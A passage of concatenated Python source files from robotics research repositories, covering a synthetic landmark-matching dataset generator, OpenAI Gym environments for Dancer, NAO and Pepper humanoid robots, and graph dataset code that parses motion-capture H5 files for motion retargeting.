global_pose = np.expand_dims(global_pose, axis=1)
local_pose = (rotation @ (global_pose + translation))
local_x = local_pose[0][0]
local_y = local_pose[1][0]
local_label = landmark[2]
local_landmark = [local_x, local_y, local_label]
theta = math.atan2(local_landmark[1], local_landmark[0]) / math.pi * 180.0
if math.hypot(local_x, local_y) < visual_range and theta > 90 - visual_theta and theta < 90 + visual_theta:
local_map.append(local_landmark)
match.append(i)
return base_pose, local_map, match
def visualize_all(global_map, local_map, base_pose):
# global map
plt.subplot(121)
plt.gcf().gca().title.set_text("Global Map")
plt.gcf().set_figheight(10)
plt.gcf().set_figwidth(20)
# plt.gcf().gca().set_xlabel("X(m)")
# plt.gcf().gca().set_ylabel("Y(m)")
for landmark in global_map:
plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]])
# base pose
plt.scatter(base_pose[0], base_pose[1], s=80, c='r', marker=(5, 1))
orientation = [base_pose[0] + visual_range * math.cos(base_pose[2]), base_pose[1] + visual_range * math.sin(base_pose[2])]
plt.plot([base_pose[0], orientation[0]], [base_pose[1], orientation[1]], c='r')
arc = patches.Arc((base_pose[0], base_pose[1]), 2 * visual_range, 2 * visual_range, base_pose[2] * 180.0 / math.pi, -visual_theta, visual_theta, color='r', linewidth=2, fill=False)
plt.gcf().gca().add_patch(arc)
theta_min = [base_pose[0] + visual_range * math.cos(base_pose[2] + visual_theta / 180.0 * math.pi), base_pose[1] + visual_range * math.sin(base_pose[2] + visual_theta / 180.0 * math.pi)]
plt.plot([base_pose[0], theta_min[0]], [base_pose[1], theta_min[1]], c='r')
theta_max = [base_pose[0] + visual_range * math.cos(base_pose[2] - visual_theta / 180.0 * math.pi), base_pose[1] + visual_range * math.sin(base_pose[2] - visual_theta / 180.0 * math.pi)]
plt.plot([base_pose[0], theta_max[0]], [base_pose[1], theta_max[1]], c='r')
# local map
plt.subplot(122)
plt.gcf().gca().title.set_text("Local Map")
# plt.gcf().gca().set_xlabel("X(m)")
# plt.gcf().gca().set_ylabel("Y(m)")
plt.scatter(0, 0, s=80, c='r', marker=(5, 1))
for landmark in local_map:
plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]], marker=(5, 0))
plt.show()
def gen_dataset():
# keypoints list(float(x,y))
# scores float(1.)
# descriptors list(int[0,len(labels)]*total_nums)
# matches list(float(x,y))
# matching_scores list(float(1.))
# base_pose float(x,y)
# init raw data
gm = create_global_map()
bp, lm, match = create_local_map(gm)
# make sure that lm is not empty
while(len(lm)==0):
bp, lm, match = create_local_map(gm)
gm = add_gaussian_noise(gm)
bp = torch.Tensor(bp[0:2])
# base map
gsize = len(gm)
keypoints0 = torch.from_numpy(np.array(gm)[:, 0:2])
scores0 = torch.ones(gsize)
descriptors0 = torch.Tensor([[i[2]] for i in gm])
idx = iter(range(gsize))
matches0 = torch.Tensor([next(idx) if i in match else -1 for i in range(gsize)])
matching_scores0 = torch.Tensor([1. if matches0[i] > -1 else 0. for i in range(gsize)])
# match map
lsize = len(lm)
keypoints1 = torch.from_numpy(np.array(lm)[:, 0:2])
scores1 = torch.ones(lsize)
descriptors1 = torch.Tensor([[i[2]] for i in lm])
matches1 = match
matching_scores1 = torch.ones(lsize)
data = dict({'keypoints0': keypoints0, 'keypoints1': keypoints1,
'scores0': scores0, 'scores1': scores1,
'descriptors0': descriptors0, 'descriptors1': descriptors1,
'matches0': matches0, 'matches1': matches1,
'matching_scores0': matching_scores0, 'matching_scores1': matching_scores1,
'base_pose': bp})
return data
if __name__ == '__main__':
# create global map
# global_map = create_global_map()
# visualize_map(global_map)
# add noise
# noise_map = add_gaussian_noise(global_map)
# visualize_map(noise_map)
# create local map
# base_pose, local_map, _= create_local_map(global_map)
# visualize all
# visualize_all(global_map, local_map, base_pose)
# print(gen_dataset())
for i in range(1):
# pickle.dump(gen_dataset(), open(os.path.join(save_path, str(i).zfill(4)+".pkl"), "wb"))
np.save(os.path.join(save_path, str(i).zfill(4)+".npy"), gen_dataset())
``` |
{
"source": "0aqz0/humanoid-gym",
"score": 2
} |
#### File: humanoid_gym/envs/dancer_env.py
```python
import os
import gym
from gym import spaces
from gym.utils import seeding
import pybullet as p
import pybullet_data
import numpy as np
class DancerEnv(gym.Env):
"""docstring for DancerEnv"""
def __init__(self):
super(DancerEnv, self).__init__()
p.connect(p.GUI)
p.resetDebugVisualizerCamera(cameraDistance=1.5, cameraYaw=0, cameraPitch=-20, cameraTargetPosition=[0,0,0.1])
self.reset()
def step(self, action, custom_reward=None):
p.configureDebugVisualizer(p.COV_ENABLE_SINGLE_STEP_RENDERING)
p.setJointMotorControlArray(self.dancerUid, [self.joint2Index[joint] for joint in self.joint_names], p.POSITION_CONTROL, action)
p.stepSimulation()
# get states
jointStates = {}
for joint in self.joint_names:
jointStates[joint] = p.getJointState(self.dancerUid, self.joint2Index[joint])
linkStates = {}
for link in self.link_names:
linkStates[link] = p.getLinkState(self.dancerUid, self.link2Index[link])
# recover color
for index, color in self.linkColor.items():
p.changeVisualShape(self.dancerUid, index, rgbaColor=color)
# check collision
collision = False
for link in self.link_names:
if len(p.getContactPoints(bodyA=self.dancerUid, linkIndexA=self.link2Index[link])) > 0:
collision = True
for contact in p.getContactPoints(bodyA=self.dancerUid, bodyB=self.dancerUid, linkIndexA=self.link2Index[link]):
print("Collision Occurred in Link {} & Link {}!!!".format(contact[3], contact[4]))
p.changeVisualShape(self.dancerUid, contact[3], rgbaColor=[1,0,0,1])
p.changeVisualShape(self.dancerUid, contact[4], rgbaColor=[1,0,0,1])
self.step_counter += 1
if custom_reward is None:
# default reward
reward = 0
done = False
else:
# custom reward
reward, done = custom_reward(jointStates=jointStates, linkStates=linkStates, collision=collision, step_counter=self.step_counter)
info = {'collision': collision}
observation = [jointStates[joint][0] for joint in self.joint_names]
return observation, reward, done, info
def reset(self):
p.resetSimulation()
self.step_counter = 0
self.dancerUid = p.loadURDF(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"assets/dancer/dancer_urdf_model.URDF"), basePosition=[-0.3,-0.3,0.3], baseOrientation=[0, 0.7071068, -0.7071068, 0],
flags=p.URDF_USE_SELF_COLLISION+p.URDF_USE_SELF_COLLISION_EXCLUDE_ALL_PARENTS)
p.setAdditionalSearchPath(pybullet_data.getDataPath())
self.ground_id = p.loadMJCF("mjcf/ground_plane.xml") # ground plane
p.setGravity(0,0,-10)
p.setPhysicsEngineParameter(numSolverIterations=150)
p.setTimeStep(1./240.)
self.joint_names = []
self.joint2Index = {} # index map to jointName
self.link_names = []
self.link2Index = {} # index map to linkName
self.lower_limits = []
self.upper_limits = []
self.init_angles = []
for index in range(p.getNumJoints(self.dancerUid)):
jointName = p.getJointInfo(self.dancerUid, index)[1].decode('utf-8')
linkName = p.getJointInfo(self.dancerUid, index)[12].decode('utf-8')
self.joint_names.append(jointName)
self.joint2Index[jointName] = index
self.link_names.append(linkName)
self.link2Index[linkName] = index
self.lower_limits.append(-np.pi)
self.upper_limits.append(np.pi)
self.init_angles.append(0)
# modify initial angles to avoid collision
self.init_angles[7], self.init_angles[13] = -0.05, 0.05
self.linkColor = {} # index map to jointColor
for data in p.getVisualShapeData(self.dancerUid):
linkIndex, rgbaColor = data[1], data[7]
self.linkColor[linkIndex] = rgbaColor
self.action_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names)))
self.observation_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names)))
def render(self, mode='human'):
view_matrix = p.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=[0.5,0,0.5],
distance=.7,
yaw=90,
pitch=0,
roll=0,
upAxisIndex=2)
proj_matrix = p.computeProjectionMatrixFOV(fov=60,
aspect=float(960)/720,
nearVal=0.1,
farVal=100.0)
(_, _, px, _, _) = p.getCameraImage(width=960,
height=720,
viewMatrix=view_matrix,
projectionMatrix=proj_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
rgb_array = np.array(px, dtype=np.uint8)
rgb_array = np.reshape(rgb_array, (720,960,4))
rgb_array = rgb_array[:, :, :3]
return rgb_array
def close(self):
p.disconnect()
```
#### File: humanoid_gym/envs/nao_env_real.py
```python
import os
import gym
from gym import spaces
import pybullet as p
import numpy as np
from scipy.spatial.transform import Rotation as R
from qibullet.robot_posture import NaoPosture
import qi
import time
import threading
class NaoEnvReal(gym.Env):
"""docstring for NaoEnvReal"""
def __init__(self):
super(NaoEnvReal, self).__init__()
self.session = qi.Session()
self.robot_url = '169.254.204.242'
self.session.connect(self.robot_url)
self.motion = self.session.service("ALMotion")
self.motion.setStiffnesses('Body', 1)
self.memory = self.session.service("ALMemory")
self.posture = self.session.service("ALRobotPosture")
self.posture.goToPosture('Stand', 1)
# joint parameters
minAngle = {}
maxAngle = {}
limits = self.motion.getLimits("Body")
jointNames = self.motion.getBodyNames("Body")
for name, limit in zip(jointNames, limits):
minAngle[name] = limit[0]
maxAngle[name] = limit[1]
self.joint_names = ['LShoulderPitch', 'LShoulderRoll', 'LElbowYaw', 'LElbowRoll', 'LWristYaw', 'RShoulderPitch', 'RShoulderRoll', 'RElbowYaw', 'RElbowRoll', 'RWristYaw',
'LHipYawPitch', 'LHipRoll', 'LHipPitch', 'LKneePitch', 'LAnklePitch', 'LAnkleRoll', 'RHipYawPitch', 'RHipRoll', 'RHipPitch', 'RKneePitch', 'RAnklePitch', 'RAnkleRoll']
self.lower_limits = [minAngle[name] for name in self.joint_names]
self.upper_limits = [maxAngle[name] for name in self.joint_names]
# stand pose parameters
pose = NaoPosture('Stand')
pose_dict = {}
for joint_name, joint_value in zip(pose.joint_names, pose.joint_values):
pose_dict[joint_name] = joint_value
self.init_angles = []
for joint_name in self.joint_names:
self.init_angles.append(pose_dict[joint_name])
# self.action_space = spaces.Box(np.array(self.lower_limits), np.array(self.upper_limits))
self.obs_history = []
self.obs_length = 10
self.action_space = spaces.Box(low=-0.5, high=0.5, shape=(len(self.joint_names),), dtype="float32")
self.observation_space = spaces.Box(low=-float('inf'), high=float('inf'), shape=(len(self._get_obs())*self.obs_length,), dtype="float32")
self._max_episode_steps = 1000
def _get_obs(self):
# torso rpy
torsoAngleX = self.memory.getData(
"Device/SubDeviceList/InertialSensor/AngleX/Sensor/Value")
torsoAngleY = self.memory.getData(
"Device/SubDeviceList/InertialSensor/AngleY/Sensor/Value")
torsoAngleZ = self.memory.getData(
"Device/SubDeviceList/InertialSensor/AngleZ/Sensor/Value")
# angles
angles = np.array(self.motion.getAngles(self.joint_names, True))
# get foot contact
l_touch_ground = self.memory.getData('Device/SubDeviceList/LFoot/FSR/RearLeft/Sensor/Value') > 0.1 \
or self.memory.getData('Device/SubDeviceList/LFoot/FSR/RearRight/Sensor/Value') > 0.1
r_touch_ground = self.memory.getData(
'Device/SubDeviceList/RFoot/FSR/RearLeft/Sensor/Value') > 0.1
# observation
obs = angles
return obs
# def _get_obs_history(self):
# self.obs_history.append(self._get_obs())
# if len(self.obs_history) < 3:
# concat_obs = np.concatenate([self.obs_history[-1]]*3, axis=0)
# else:
# concat_obs = np.concatenate(self.obs_history[-3:], axis=0)
# return concat_obs
def step(self, actions, joints=None):
# set joint angles
if isinstance(actions, np.ndarray):
actions = actions.tolist()
self.motion.setAngles(self.joint_names if joints is None else joints, actions, 1.0)
reward = 0
done = False
info = None
return self._get_obs(), reward, done, info
def reset(self):
return self._get_obs()
def render(self, mode='human'):
pass
def close(self):
pass
```
#### File: humanoid_gym/envs/pepper_env.py
```python
import os
import gym
from gym import spaces
import pybullet as p
import numpy as np
from qibullet import SimulationManager
from qibullet import PepperVirtual
from qibullet.robot_posture import PepperPosture
import time
class PepperEnv(gym.Env):
"""docstring for PepperEnv"""
def __init__(self):
super(PepperEnv, self).__init__()
self.simulation_manager = SimulationManager()
self.client = self.simulation_manager.launchSimulation(gui=True)
self.simulation_manager.setLightPosition(self.client, [0,0,100])
self.robot = self.simulation_manager.spawnPepper(self.client, spawn_ground_plane=True)
time.sleep(1.0)
# stand pose parameters
pose = PepperPosture('Stand')
pose_dict = {}
for joint_name, joint_value in zip(pose.joint_names, pose.joint_values):
pose_dict[joint_name] = joint_value
# joint parameters
self.joint_names = ['LShoulderPitch',
'LShoulderRoll',
'LElbowYaw',
'LElbowRoll',
'LWristYaw',
'LHand',
'RShoulderPitch',
'RShoulderRoll',
'RElbowYaw',
'RElbowRoll',
'RWristYaw',
'RHand']
self.lower_limits = []
self.upper_limits = []
self.init_angles = []
for joint_name in self.joint_names:
joint = self.robot.joint_dict[joint_name]
self.lower_limits.append(joint.getLowerLimit())
self.upper_limits.append(joint.getUpperLimit())
self.init_angles.append(pose_dict[joint_name])
self.link_names = []
for joint_name in self.joint_names:
linkName = p.getJointInfo(self.robot.getRobotModel(), self.robot.joint_dict[joint_name].getIndex())[12].decode("utf-8")
self.link_names.append(linkName)
self.action_space = spaces.Box(np.array([-1]*3 + self.lower_limits), np.array([1]*3 + self.upper_limits))
self.observation_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names)))
def step(self, actions):
if isinstance(actions, np.ndarray):
actions = actions.tolist()
# set joint angles
self.robot.setAngles(self.joint_names, actions, 1.0)
# get observations
observation = {
'position': self.robot.getPosition(),
'anglesPosition': self.robot.getAnglesPosition(self.joint_names),
'anglesVelocity': self.robot.getAnglesVelocity(self.joint_names),
# TODO: add more observations
}
# TODO: design your reward
reward = 0
done = False
info = {}
return observation, reward, done, info
def reset(self):
self.simulation_manager.removePepper(self.robot)
self.robot = self.simulation_manager.spawnPepper(self.client, spawn_ground_plane=True)
time.sleep(1.0)
def render(self, mode='human'):
view_matrix = p.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=[0.5,0,0.5],
distance=.7,
yaw=90,
pitch=0,
roll=0,
upAxisIndex=2)
proj_matrix = p.computeProjectionMatrixFOV(fov=60,
aspect=float(960)/720,
nearVal=0.1,
farVal=100.0)
(_, _, px, _, _) = p.getCameraImage(width=960,
height=720,
viewMatrix=view_matrix,
projectionMatrix=proj_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
rgb_array = np.array(px, dtype=np.uint8)
rgb_array = np.reshape(rgb_array, (720,960,4))
rgb_array = rgb_array[:, :, :3]
return rgb_array
def close(self):
p.disconnect()
``` |
{
"source": "0aqz0/neural-retargeting",
"score": 2
} |
#### File: 0aqz0/neural-retargeting/dataset.py
```python
import torch
import torch_geometric.transforms as transforms
from torch_geometric.data import Data as OldData
from torch_geometric.data import InMemoryDataset
import os
import math
import numpy as np
from numpy.linalg import inv
from scipy.spatial.transform import Rotation as R
from utils.urdf2graph import yumi2graph, hand2graph
import h5py
class Data(OldData):
def __inc__(self, key, value):
if key == 'edge_index':
return self.num_nodes
elif key == 'l_hand_edge_index':
return self.l_hand_num_nodes
elif key == 'r_hand_edge_index':
return self.r_hand_num_nodes
else:
return 0
"""
Normalize by a constant coefficient
"""
class Normalize(object):
def __call__(self, data, coeff=100.0):
if hasattr(data, 'x'):
data.x = data.x/coeff
if hasattr(data, 'l_hand_x'):
data.l_hand_x = data.l_hand_x/coeff
if hasattr(data, 'r_hand_x'):
data.r_hand_x = data.r_hand_x/coeff
return data
def __repr__(self):
return '{}()'.format(self.__class__.__name__)
"""
Target Dataset for Yumi Manipulator
"""
class YumiDataset(InMemoryDataset):
yumi_cfg = {
'joints_name': [
'yumi_joint_1_l',
'yumi_joint_2_l',
'yumi_joint_7_l',
'yumi_joint_3_l',
'yumi_joint_4_l',
'yumi_joint_5_l',
'yumi_joint_6_l',
'yumi_joint_1_r',
'yumi_joint_2_r',
'yumi_joint_7_r',
'yumi_joint_3_r',
'yumi_joint_4_r',
'yumi_joint_5_r',
'yumi_joint_6_r',
],
'edges': [
['yumi_joint_1_l', 'yumi_joint_2_l'],
['yumi_joint_2_l', 'yumi_joint_7_l'],
['yumi_joint_7_l', 'yumi_joint_3_l'],
['yumi_joint_3_l', 'yumi_joint_4_l'],
['yumi_joint_4_l', 'yumi_joint_5_l'],
['yumi_joint_5_l', 'yumi_joint_6_l'],
['yumi_joint_1_r', 'yumi_joint_2_r'],
['yumi_joint_2_r', 'yumi_joint_7_r'],
['yumi_joint_7_r', 'yumi_joint_3_r'],
['yumi_joint_3_r', 'yumi_joint_4_r'],
['yumi_joint_4_r', 'yumi_joint_5_r'],
['yumi_joint_5_r', 'yumi_joint_6_r'],
],
'root_name': [
'yumi_joint_1_l',
'yumi_joint_1_r',
],
'end_effectors': [
'yumi_joint_6_l',
'yumi_joint_6_r',
],
'shoulders': [
'yumi_joint_2_l',
'yumi_joint_2_r',
],
'elbows': [
'yumi_joint_3_l',
'yumi_joint_3_r',
],
}
def __init__(self, root, transform=None, pre_transform=None):
super(YumiDataset, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data_list.append(yumi2graph(file, self.yumi_cfg))
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
Map glove data to inspire hand data
"""
def linear_map(x_, min_, max_, min_hat, max_hat):
x_hat = 1.0 * (x_ - min_) / (max_ - min_) * (max_hat - min_hat) + min_hat
return x_hat
def map_glove_to_inspire_hand(glove_angles):
### This function linearly maps the Wiseglove angle measurement to Inspire hand's joint angles.
## preparation, specify the range for linear scaling
hand_start = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3, 0.1, 0.0, 0.0]) # radius already
hand_final = np.array([-1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -0.75, 0.0, -0.2, -0.15])
glove_start = np.array([0, 0, 53, 0, 0, 22, 0, 0, 22, 0, 0, 35, 0, 0])# * pi / 180.0 # degree to radius
glove_final = np.array([45, 100, 0, 90, 120, 0, 90, 120, 0, 90, 120, 0, 90, 120])# * pi / 180.0
length = glove_angles.shape[0]
hand_angles = np.zeros((length, 12)) # 12 joints
## Iterate to map angles
for i in range(length):
# four fingers' extension/flexion (abduction/adduction are dumped)
hand_angles[i, 0] = linear_map(glove_angles[i, 3], glove_start[3], glove_final[3], hand_start[0], hand_final[0]) # Link1 (joint name)
hand_angles[i, 1] = linear_map(glove_angles[i, 4], glove_start[4], glove_final[4], hand_start[1], hand_final[1]) # Link11
hand_angles[i, 2] = linear_map(glove_angles[i, 6], glove_start[6], glove_final[6], hand_start[2], hand_final[2]) # Link2
hand_angles[i, 3] = linear_map(glove_angles[i, 7], glove_start[7], glove_final[7], hand_start[3], hand_final[3]) # Link22
hand_angles[i, 4] = linear_map(glove_angles[i, 9], glove_start[9], glove_final[9], hand_start[4], hand_final[4]) # Link3
hand_angles[i, 5] = linear_map(glove_angles[i, 10], glove_start[10], glove_final[10], hand_start[5], hand_final[5]) # Link33
hand_angles[i, 6] = linear_map(glove_angles[i, 12], glove_start[12], glove_final[12], hand_start[6], hand_final[6]) # Link4
hand_angles[i, 7] = linear_map(glove_angles[i, 13], glove_start[13], glove_final[13], hand_start[7], hand_final[7]) # Link44
# thumb
hand_angles[i, 8] = (hand_start[8] + hand_final[8]) / 2.0 # Link5 (rotation about z axis), fixed!
hand_angles[i, 9] = linear_map(glove_angles[i, 2], glove_start[2], glove_final[2], hand_start[9], hand_final[9]) # Link 51
hand_angles[i, 10] = linear_map(glove_angles[i, 0], glove_start[0], glove_final[0], hand_start[10], hand_final[10]) # Link 52
hand_angles[i, 11] = linear_map(glove_angles[i, 1], glove_start[1], glove_final[1], hand_start[11], hand_final[11]) # Link 53
return hand_angles
"""
Parse H5 File
"""
def parse_h5(filename, selected_key=None):
data_list = []
h5_file = h5py.File(filename, 'r')
# print(filename, h5_file.keys(), len(h5_file.keys()))
if selected_key is None:
keys = h5_file.keys()
else:
keys = [selected_key]
for key in keys:
if '语句' in key and selected_key is None:
print('Skipping'+key)
continue
# glove data
l_glove_angle = h5_file[key + '/l_glove_angle'][:]
r_glove_angle = h5_file[key + '/r_glove_angle'][:]
l_hand_angle = map_glove_to_inspire_hand(l_glove_angle)
r_hand_angle = map_glove_to_inspire_hand(r_glove_angle)
# position data
l_shoulder_pos = h5_file[key + '/l_up_pos'][:]
r_shoulder_pos = h5_file[key + '/r_up_pos'][:]
l_elbow_pos = h5_file[key + '/l_fr_pos'][:]
r_elbow_pos = h5_file[key + '/r_fr_pos'][:]
l_wrist_pos = h5_file[key + '/l_hd_pos'][:]
r_wrist_pos = h5_file[key + '/r_hd_pos'][:]
# quaternion data
l_shoulder_quat = R.from_quat(h5_file[key + '/l_up_quat'][:])
r_shoulder_quat = R.from_quat(h5_file[key + '/r_up_quat'][:])
l_elbow_quat = R.from_quat(h5_file[key + '/l_fr_quat'][:])
r_elbow_quat = R.from_quat(h5_file[key + '/r_fr_quat'][:])
l_wrist_quat = R.from_quat(h5_file[key + '/l_hd_quat'][:])
r_wrist_quat = R.from_quat(h5_file[key + '/r_hd_quat'][:])
# rotation matrix data
l_shoulder_matrix = l_shoulder_quat.as_matrix()
r_shoulder_matrix = r_shoulder_quat.as_matrix()
l_elbow_matrix = l_elbow_quat.as_matrix()
r_elbow_matrix = r_elbow_quat.as_matrix()
l_wrist_matrix = l_wrist_quat.as_matrix()
r_wrist_matrix = r_wrist_quat.as_matrix()
# transform to local coordinates
# l_wrist_matrix = l_wrist_matrix * inv(l_elbow_matrix)
# r_wrist_matrix = r_wrist_matrix * inv(r_elbow_matrix)
# l_elbow_matrix = l_elbow_matrix * inv(l_shoulder_matrix)
# r_elbow_matrix = r_elbow_matrix * inv(r_shoulder_matrix)
# l_shoulder_matrix = l_shoulder_matrix * inv(l_shoulder_matrix)
# r_shoulder_matrix = r_shoulder_matrix * inv(r_shoulder_matrix)
# euler data
l_shoulder_euler = R.from_matrix(l_shoulder_matrix).as_euler('zyx', degrees=True)
r_shoulder_euler = R.from_matrix(r_shoulder_matrix).as_euler('zyx', degrees=True)
l_elbow_euler = R.from_matrix(l_elbow_matrix).as_euler('zyx', degrees=True)
r_elbow_euler = R.from_matrix(r_elbow_matrix).as_euler('zyx', degrees=True)
l_wrist_euler = R.from_matrix(l_wrist_matrix).as_euler('zyx', degrees=True)
r_wrist_euler = R.from_matrix(r_wrist_matrix).as_euler('zyx', degrees=True)
total_frames = l_shoulder_pos.shape[0]
for t in range(total_frames):
data = parse_arm(l_shoulder_euler[t], l_elbow_euler[t], l_wrist_euler[t], r_shoulder_euler[t], r_elbow_euler[t], r_wrist_euler[t],
l_shoulder_pos[t], l_elbow_pos[t], l_wrist_pos[t], r_shoulder_pos[t], r_elbow_pos[t], r_wrist_pos[t],
l_shoulder_quat[t], l_elbow_quat[t], l_wrist_quat[t], r_shoulder_quat[t], r_elbow_quat[t], r_wrist_quat[t])
data_list.append(data)
return data_list, l_hand_angle, r_hand_angle
def parse_arm(l_shoulder_euler, l_elbow_euler, l_wrist_euler, r_shoulder_euler, r_elbow_euler, r_wrist_euler,
l_shoulder_pos, l_elbow_pos, l_wrist_pos, r_shoulder_pos, r_elbow_pos, r_wrist_pos,
l_shoulder_quat, l_elbow_quat, l_wrist_quat, r_shoulder_quat, r_elbow_quat, r_wrist_quat):
# x
x = torch.stack([torch.from_numpy(l_shoulder_euler),
torch.from_numpy(l_elbow_euler),
torch.from_numpy(l_wrist_euler),
torch.from_numpy(r_shoulder_euler),
torch.from_numpy(r_elbow_euler),
torch.from_numpy(r_wrist_euler)], dim=0).float()
# number of nodes
num_nodes = 6
# edge index
edge_index = torch.LongTensor([[0, 1, 3, 4],
[1, 2, 4, 5]])
# position
pos = torch.stack([torch.from_numpy(l_shoulder_pos),
torch.from_numpy(l_elbow_pos),
torch.from_numpy(l_wrist_pos),
torch.from_numpy(r_shoulder_pos),
torch.from_numpy(r_elbow_pos),
torch.from_numpy(r_wrist_pos)], dim=0).float()
# edge attributes
edge_attr = []
for edge in edge_index.permute(1, 0):
parent = edge[0]
child = edge[1]
edge_attr.append(pos[child] - pos[parent])
edge_attr = torch.stack(edge_attr, dim=0)
# skeleton type & topology type
skeleton_type = 0
topology_type = 0
# end effector mask
ee_mask = torch.zeros(num_nodes, 1).bool()
ee_mask[2] = ee_mask[5] = True
# shoulder mask
sh_mask = torch.zeros(num_nodes, 1).bool()
sh_mask[0] = sh_mask[3] = True
# elbow mask
el_mask = torch.zeros(num_nodes, 1).bool()
el_mask[1] = el_mask[4] = True
# parent
parent = torch.LongTensor([-1, 0, 1, -1, 3, 4])
# offset
offset = torch.zeros(num_nodes, 3)
for node_idx in range(num_nodes):
if parent[node_idx] != -1:
offset[node_idx] = pos[node_idx] - pos[parent[node_idx]]
else:
offset[node_idx] = pos[node_idx]
# distance to root
root_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
root_dist[node_idx] = dist
# distance to shoulder
shoulder_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1 and current_idx != 0 and current_idx != 3:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
shoulder_dist[node_idx] = dist
# distance to elbow
elbow_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1 and current_idx != 1 and current_idx != 4:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
elbow_dist[node_idx] = dist
# quaternion
q = torch.stack([torch.from_numpy(l_shoulder_quat.as_quat()),
torch.from_numpy(l_elbow_quat.as_quat()),
torch.from_numpy(l_wrist_quat.as_quat()),
torch.from_numpy(r_shoulder_quat.as_quat()),
torch.from_numpy(r_elbow_quat.as_quat()),
torch.from_numpy(r_wrist_quat.as_quat())], dim=0).float()
data = Data(x=torch.cat([x,pos], dim=-1),
edge_index=edge_index,
edge_attr=edge_attr,
pos=pos,
q=q,
skeleton_type=skeleton_type,
topology_type=topology_type,
ee_mask=ee_mask,
sh_mask=sh_mask,
el_mask=el_mask,
root_dist=root_dist,
shoulder_dist=shoulder_dist,
elbow_dist=elbow_dist,
num_nodes=num_nodes,
parent=parent,
offset=offset)
# print(data)
return data
"""
Source Dataset for Sign Language
"""
class SignDataset(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(SignDataset, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
data_path = os.path.join(self.root, 'h5')
self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data, _, _ = parse_h5(file)
data_list.extend(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
parse h5 with hand
"""
def parse_h5_hand(filename, selected_key=None):
data_list = []
h5_file = h5py.File(filename, 'r')
if selected_key is None:
keys = h5_file.keys()
else:
keys = [selected_key]
for key in keys:
if '语句' in key and selected_key is None:
print('Skipping'+key)
continue
# glove data
l_glove_pos = h5_file[key + '/l_glove_pos'][:]
r_glove_pos = h5_file[key + '/r_glove_pos'][:]
# insert zero for root
total_frames = l_glove_pos.shape[0]
l_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), l_glove_pos], axis=1)
r_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), r_glove_pos], axis=1)
# print(l_glove_pos.shape, r_glove_pos.shape)
# switch dimensions
l_glove_pos = np.stack([-l_glove_pos[..., 2], -l_glove_pos[..., 1], -l_glove_pos[..., 0]], axis=-1)
r_glove_pos = np.stack([-r_glove_pos[..., 2], -r_glove_pos[..., 1], -r_glove_pos[..., 0]], axis=-1)
for t in range(total_frames):
data = parse_glove_pos(l_glove_pos[t])
data.l_hand_x = data.x
data.l_hand_edge_index = data.edge_index
data.l_hand_edge_attr = data.edge_attr
data.l_hand_pos = data.pos
data.l_hand_ee_mask = data.ee_mask
data.l_hand_el_mask = data.el_mask
data.l_hand_root_dist = data.root_dist
data.l_hand_elbow_dist = data.elbow_dist
data.l_hand_num_nodes = data.num_nodes
data.l_hand_parent = data.parent
data.l_hand_offset = data.offset
r_hand_data = parse_glove_pos(r_glove_pos[t])
data.r_hand_x = r_hand_data.x
data.r_hand_edge_index = r_hand_data.edge_index
data.r_hand_edge_attr = r_hand_data.edge_attr
data.r_hand_pos = r_hand_data.pos
data.r_hand_ee_mask = r_hand_data.ee_mask
data.r_hand_el_mask = r_hand_data.el_mask
data.r_hand_root_dist = r_hand_data.root_dist
data.r_hand_elbow_dist = r_hand_data.elbow_dist
data.r_hand_num_nodes = r_hand_data.num_nodes
data.r_hand_parent = r_hand_data.parent
data.r_hand_offset = r_hand_data.offset
data_list.append(data)
return data_list
def parse_glove_pos(glove_pos):
# x
x = torch.from_numpy(glove_pos).float()
# number of nodes
num_nodes = 17
# edge index
edge_index = torch.LongTensor([[0, 1, 2, 0, 4, 5, 0, 7, 8, 0, 10, 11, 0, 13, 14, 15],
